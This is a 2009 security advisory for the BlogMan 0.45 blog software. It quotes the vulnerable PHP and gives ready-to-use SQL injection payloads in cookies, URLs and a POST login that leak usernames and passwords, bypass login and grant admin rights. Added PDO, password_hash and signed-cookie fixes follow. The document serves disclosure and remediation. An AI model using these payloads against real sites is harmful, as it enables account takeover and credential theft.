******* Salvatore "drosophila" Fresta *******
Application: BlogMan
http://sourceforge.net/projects/blogman/
Version: 0.45
Bug:            * Multiple SQL Injection
                * Authentication Bypass
                * Privilege Escalation
Exploitation: Remote
Date: 1 Mar 2009
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
e-mail: [email protected]
*************************************************
- BUGS
This blog is vulnerable to SQL Injection throughout.
The following vulnerable queries can be used to obtain
restricted information.
#[1] SQL Injection:
Requisites: magic_quotes_gpc = off
File affected: index.php, register.php, viewall.php
The following lines are improperly checked:
/*
if (isset($_COOKIE['blogmanuserid'])) {
$id = $_COOKIE['blogmanuserid'];
$query = "SELECT * FROM user WHERE UserID='".$id."'";
$user = mysql_fetch_array(mysql_query($query)) or die(mysql_error());
echo "<p class='loginusername'><a href='edit.php?id=".$id."'>".$user['UserName']."</a></p>\n";
*/
Using a cookie editor it is possible to edit that cookie
and manipulate the query, as follows:
Name: blogmanuserid
Content: -1' UNION ALL SELECT 1,CONCAT(UserName,char(58),UserPassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16 FROM user#
Server: target_server (example: localhost)
Path: /blogman/
#[2] SQL Injection:
Requisites: magic_quotes_gpc = off
File affected: read.php
This bug allows a guest to view the username
and password of a registered user.
http://site/path/read.php?id=-1'UNION ALL SELECT NULL,2,CONCAT(UserName,char(58),UserPassword),NULL,5,6,7 FROM user%23
#[3] SQL Injection:
Requisites: magic_quotes_gpc = off
File affected: profile.php
This bug allows a guest to view the username
and password of a registered user.
http://site/path/profile.php?id=-1' UNION ALL SELECT 1,CONCAT(UserName,char(58),UserPassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16 FROM user%23
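The hardened form of the lookup that index.php, register.php, viewall.php, read.php and profile.php build by string concatenation, added here as an example and not BlogMan's own code. It is the fix for SQL Injection bugs [1] to [3]: the id taken from the cookie or the query string is validated as a positive integer and then bound as a prepared-statement parameter through PDO, and the query selects only the columns the page needs. The DSN, the credentials and the PHP 7 type hints are assumptions; the table and column names are the ones the advisory quotes. Relying on magic_quotes_gpc is not a mitigation: it was removed in PHP 5.4, and escaping is no substitute for parameterisation.

```php
<?php
// Added example, not BlogMan code. Assumes a PDO connection to the BlogMan
// database and a `user` table with the UserID and UserName columns.

function connectDb(): PDO
{
    // Emulated prepares are switched off so MySQL itself binds the parameters.
    return new PDO(
        'mysql:host=localhost;dbname=blogman;charset=utf8mb4',   // assumed DSN
        'blogman', 'secret',                                      // assumed credentials
        [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
         PDO::ATTR_EMULATE_PREPARES => false]
    );
}

// Returns the user row for a numeric id, or null when the id is not a positive
// integer or no such user exists. A value such as "-1' UNION ALL SELECT ..."
// fails validation up front, and because the statement is parameterised it
// could not change the query even if validation were skipped.
function fetchUserById(PDO $db, $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    // SELECT * is what made UserPassword reachable through a UNION on the
    // original pages; fetch only what the page renders.
    $stmt = $db->prepare('SELECT UserID, UserName FROM user WHERE UserID = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Output is escaped as well, so a stored UserName cannot inject HTML.
function renderLoginLink(?array $user): string
{
    if ($user === null) {
        return '';
    }
    $id   = (int) $user['UserID'];
    $name = htmlspecialchars($user['UserName'], ENT_QUOTES, 'UTF-8');
    return "<p class='loginusername'><a href='edit.php?id={$id}'>{$name}</a></p>\n";
}

// Usage, in place of the original index.php snippet:
// $db = connectDb();
// echo renderLoginLink(fetchUserById($db, $_COOKIE['blogmanuserid'] ?? ''));
// read.php and profile.php would call fetchUserById($db, $_GET['id'] ?? '').
```

With this change the injected cookie or id values shown above produce an empty page fragment instead of a username and password hash. The cookie still names the user, however, so the page remains open to the plain cookie forgery described under Authentication Bypass [2]; closing that requires the cookie to be signed, or replaced by a server-side session, rather than taken at face value.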
#[1] Authentication Bypass:
Requisites: magic_quotes_gpc = off
File affected: doLogin.php
The following lines are improperly checked:
/*
$un = $_POST['un'];
$pw = $_POST['pw'];
...
$pwHashed = mysql_fetch_array(mysql_query("SELECT PASSWORD('".$pw."')"));
$userRow = mysql_fetch_array(mysql_query("SELECT * FROM user WHERE UserName='".$un."'"));
if ($userRow['UserPassword'] == $pwHashed[0] &&
$userRow['UserActive'] && !$userRow['UserDisabled']) {
$expires = time() + 3*24*60*60;
setcookie("blogmanuserid", $userRow['UserID'], $expires);
}
*/
Using a SQL Injection bug it is possible to bypass
the login checks and set an arbitrary UserID value in the cookie.
The following information must be sent using
POST method to doLogin.php
un = ' UNION ALL SELECT 1,NULL,PASSWORD('mypass'),NULL,NULL,NULL,NULL,NULL,NULL,0,1,NULL,NULL,NULL,NULL,NULL#
pw = mypass
The first value is UserID, the third value is the password,
the tenth value is UserDisabled and the eleventh value is
UserActive.
#[2] Authentication Bypass:
Requisites: none
File affected: all
It is possible to bypass the authentication
system by creating a cookie named 'blogmanuserid'
and setting its content to the id of a registered user
(the admin account is often UserID 1):
Name: blogmanuserid
Content: 1
Server: target_server (example: localhost)
Path: /blogman/
#[1] Privilege Escalation:
Requisites: magic_quotes_gpc = off
File affected: admin.php
It is possible to escalate privileges using
a SQL Injection bug through a cookie.
The following lines are improperly checked:
/*
$id = $_COOKIE['blogmanuserid'];
$user = mysql_fetch_array(mysql_query("SELECT * FROM user WHERE UserID='".$id."'"));
if (!$user['UserCanAdmin']) {
echo "<meta http-equiv='refresh' content='0;index.php'></head></html>";
} else {
...
}
*/
Name: blogmanuserid
Content: -1' UNION ALL SELECT 2,NULL,3,4,5,6,7,8,9,10,11,12,13,14,15,1#
Server: target_server (example: localhost)
Path: /blogman/
The first value is UserID and the last value
is UserCanAdmin.
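A rewrite of doLogin.php's checks, the identity cookie and admin.php's authorisation, added here as an example and not BlogMan's own code. It addresses Authentication Bypass [1] and [2] and the Privilege Escalation above together: the username is bound as a prepared-statement parameter, so no UNION row can satisfy the password comparison; the password is checked with password_verify() against a password_hash() value rather than MySQL's PASSWORD(); the blogmanuserid cookie carries an HMAC, so its value cannot be edited to another UserID; and UserCanAdmin is re-read from the row selected by that verified id instead of from whatever row the cookie's SQL produced. The COOKIE_SECRET placeholder, the password_hash() storage format and the PHP 7.3+ setcookie() options are assumptions; the table, column and cookie names are the ones the advisory quotes.

```php
<?php
// Added example, not BlogMan code. Assumes a PDO connection to the BlogMan
// database, a `user` table whose UserPassword column holds password_hash()
// output, and a random server-side secret in COOKIE_SECRET (placeholder).

const COOKIE_NAME   = 'blogmanuserid';
const COOKIE_SECRET = 'REPLACE-WITH-RANDOM-32-BYTE-SECRET';   // placeholder

// doLogin.php replacement: returns the UserID on success, null otherwise.
function login(PDO $db, string $un, string $pw): ?int
{
    $stmt = $db->prepare(
        'SELECT UserID, UserPassword, UserActive, UserDisabled FROM user WHERE UserName = :un'
    );
    $stmt->execute([':un' => $un]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    // The username is bound, not concatenated, so the client cannot supply the
    // row (and its password column) the way the UNION payload did.
    if ($row === false || !password_verify($pw, $row['UserPassword'])) {
        return null;
    }
    if (!$row['UserActive'] || $row['UserDisabled']) {
        return null;
    }
    return (int) $row['UserID'];
}

// Cookie value is "<id>.<hmac>"; only the holder of COOKIE_SECRET can mint one,
// so setting the cookie to "1" by hand no longer yields an admin session.
function issueIdentityCookie(int $userId, int $ttlSeconds = 3 * 24 * 60 * 60): void
{
    $payload = (string) $userId;
    $mac     = hash_hmac('sha256', $payload, COOKIE_SECRET);
    setcookie(COOKIE_NAME, $payload . '.' . $mac, [
        'expires'  => time() + $ttlSeconds,
        'path'     => '/blogman/',
        'httponly' => true,
        'secure'   => true,      // requires HTTPS
        'samesite' => 'Lax',
    ]);
}

// Replacement for reading $_COOKIE['blogmanuserid'] directly: returns the
// UserID only when the signature verifies, otherwise null.
function currentUserId(?string $cookie): ?int
{
    if ($cookie === null || substr_count($cookie, '.') !== 1) {
        return null;
    }
    [$payload, $mac] = explode('.', $cookie, 2);
    if (!ctype_digit($payload)) {
        return null;
    }
    $expected = hash_hmac('sha256', $payload, COOKIE_SECRET);
    // hash_equals() compares in constant time.
    return hash_equals($expected, $mac) ? (int) $payload : null;
}

// admin.php replacement: the admin flag comes from the row selected by the
// verified id with a bound parameter, so the client cannot supply it.
function isAdmin(PDO $db, ?int $userId): bool
{
    if ($userId === null) {
        return false;
    }
    $stmt = $db->prepare('SELECT UserCanAdmin FROM user WHERE UserID = :id');
    $stmt->bindValue(':id', $userId, PDO::PARAM_INT);
    $stmt->execute();
    $flag = $stmt->fetchColumn();
    return $flag !== false && (bool) $flag;
}

// Usage (doLogin.php):
//   $id = login($db, $_POST['un'] ?? '', $_POST['pw'] ?? '');
//   if ($id !== null) { issueIdentityCookie($id); }
// Usage (admin.php and any page that reads the cookie):
//   $uid = currentUserId($_COOKIE[COOKIE_NAME] ?? null);
//   if (!isAdmin($db, $uid)) { header('Location: index.php'); exit; }
```

The signed cookie keeps the advisory's three-day lifetime but does not include the expiry in the signed payload, so a captured cookie stays valid until COOKIE_SECRET is rotated; a PHP session (session_start() with the UserID in $_SESSION) is the simpler alternative and keeps the identity entirely server-side. Either way the redirect in admin.php should be followed by exit, as in the usage above, since the original emits a meta refresh and then continues executing.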
*************************************************
# milw0rm.com [2009-03-02]